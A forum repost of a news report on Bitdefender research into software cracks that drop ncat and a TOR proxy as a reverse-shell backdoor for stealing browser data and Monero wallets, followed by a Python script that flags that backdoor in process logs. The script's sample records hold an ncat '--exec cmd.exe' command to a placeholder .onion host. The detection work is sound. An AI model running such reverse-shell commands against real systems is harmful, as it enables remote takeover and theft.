
Hackers Target Software Cracks And BitTorrent Client To Steal Browser Data And Cryptocurrency



Researchers from cybersecurity company Bitdefender have warned that hackers are actively exploiting software cracks in pirated versions of Microsoft Office and Adobe Photoshop CC to empty people’s cryptocurrency wallets.

Bitdefender analysts recently uncovered a series of attacks that leverage office tools and image-editing software cracks to compromise computers, hijack crypto-currency wallets, and exfiltrate information via the TOR network.

“Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a TOR proxy,” said Bitdefender’s Bogdan Botezatu, Director of Threat Research and Reporting and Security Researcher Eduard Budaca in a blog post.

These files are placed in the system storage identified as ‘%syswow64%-nap.exe’ or ‘%syswow64%-ndc.exe’, and ‘%syswow64-tarsrv.exe’. A batch file is also placed at ‘%syswow64%-chknap.bat’ which contains a command line for the Ncat component dedicated to traversing ports 8000 and 9000 in .onion domains as shown below.

These tools work together to create a powerful backdoor that communicates through TOR with its command and control center: the ncat binary uses the listening port of the TOR proxy (`--proxy 127.0.0.1:9075`) and uses the standard `--exec` parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior).

The crack also creates persistence mechanisms for the TOR proxy file and the Ncat binary on the compromised machine with a service and a scheduled task that runs every 45 minutes.

According to Bitdefender’s investigation, the backdoor is most likely being used interactively by a human operator rather than sending automated requests to the victims. Some of the actions that were observed by the researchers are:

  • File exfiltration
  • BitTorrent client execution to exfiltrate data
  • Disabling the firewall in preparation for data exfiltration
  • Stealing of Firefox browser profile data (history, credentials, and session cookies). Before exfiltration, attackers archive the profile folder with 7zip to generate one file that contains everything.
  • Theft of the Monero wallet via the legitimate CLI client ‘monero-wallet-cli.exe’.

The above list of actions is non-exhaustive, as attackers have complete control of the system and can adapt campaigns based on their current interests.

As per Bitdefender, these types of malware-loaded cracks mostly affect people who download files from websites that have little or no control.

“These cracks are usually hosted on direct-download websites rather than on torrent portals, as the latter have a community that downvotes and flags malicious uploads,” Botezatu told TF.

Currently, distribution of these cracks is mostly found in the United States, India, Canada, Greece, Germany, Italy, Spain, South Africa, and the United Kingdom. For more information about the files and processes involved, you can read Bitdefender’s complete write-up here.
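The backdoor described above has a recognisable shape in process-creation telemetry: an Ncat binary (renamed nap.exe or ndc.exe under %SYSWOW64%) started with `--proxy` pointing at the local TOR listener and `--exec` handing the socket to a command, talking to a .onion host on port 8000 or 9000. The detection logic below is an added example written for this post, not Bitdefender's code or TorrentFreak's; the log record format, the sample records and the placeholder .onion name are constructed, and the severity scoring is the author's own choice.

```python
import re
DROPPED_NAMES = {"nap.exe", "ndc.exe", "tarsrv.exe", "chknap.bat"}  # dropped into %SYSWOW64% per the report
EXEC_FLAGS = {"--exec", "-e", "--sh-exec"}  # ncat options that hand the socket to a command
LOOPBACK = re.compile(r"^(127\.\d{1,3}\.\d{1,3}\.\d{1,3}|localhost)(:\d+)?$", re.I)
RECORD = re.compile(r'pid=(\d+)\s+image="([^"]+)"\s+cmd="([^"]*)"$')  # constructed log format

def parse_record(line):
    """Parse one process-creation record into (pid, image, argv); None if malformed."""
    m = RECORD.match(line.strip())
    return (int(m.group(1)), m.group(2), m.group(3).split()) if m else None

def options(argv):  # yield (flag, value), accepting '--proxy host:port' and '--proxy=host:port'
    for i, a in enumerate(argv):
        if a.startswith("-"):
            flag, _, inline = a.partition("=")
            yield flag.lower(), inline or (argv[i + 1] if i + 1 < len(argv) else "")

def assess(image, argv):
    """Return (severity, reasons) for one record: 'high', 'medium' or (None, [])."""
    reasons = []
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name in DROPPED_NAMES:
        reasons.append(f"image name {name} matches a file dropped by the crack")
    opts = dict(options(argv))
    exec_bound = any(f in opts for f in EXEC_FLAGS)
    if exec_bound:
        reasons.append("socket handed to a command via --exec (reverse-shell behaviour)")
    if LOOPBACK.match(opts.get("--proxy", "")):
        reasons.append(f"relayed through local proxy {opts['--proxy']} (TOR listener)")
    if any(a.lower().endswith(".onion") for a in argv):
        reasons.append("destination is a .onion address")
    if not reasons:
        return None, []  # ordinary ncat use, e.g. a port check, is not alerted
    # Command execution plus any TOR or dropped-file indicator is the backdoor pattern.
    return ("high" if exec_bound and len(reasons) > 1 else "medium"), reasons

def scan(lines):
    """Map pid -> (severity, reasons) for every record that trips a rule."""
    hits = {}
    for pid, image, argv in filter(None, map(parse_record, lines)):
        severity, reasons = assess(image, argv)
        if severity:
            hits[pid] = (severity, reasons)
    return hits
# Constructed sample records; the .onion name is a placeholder, not a real indicator.
SAMPLE = [
    'pid=4120 image="C:\\Windows\\SysWOW64\\nap.exe" cmd="nap.exe --proxy 127.0.0.1:9075 --exec cmd.exe placeholder.onion 8000"',
    'pid=4188 image="C:\\Tools\\ncat.exe" cmd="ncat.exe --proxy 127.0.0.1:9075 placeholder.onion 9000"',
    'pid=4201 image="C:\\Tools\\ncat.exe" cmd="ncat.exe -z 10.0.0.5 80"',
]
```

Running `scan(SAMPLE)` reports pid 4120 as high (all four indicators) and pid 4188 as medium (TOR-relayed .onion connection without `--exec`), while the plain port check at pid 4201 is left alone.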


Avoid unnecessary posts such as 'Thank you', 'Welcome', etc. Such posts will be deleted and the user will be warned if it happens again. If caught spamming, the following actions are applicable -

  • First time - Warning
  • Second time - 5000 Points will be deducted
  • Third time - Ban for 7 days
  • Fourth time - Permanent Ban

If the post helped you, reward the user by reacting to the post like this -

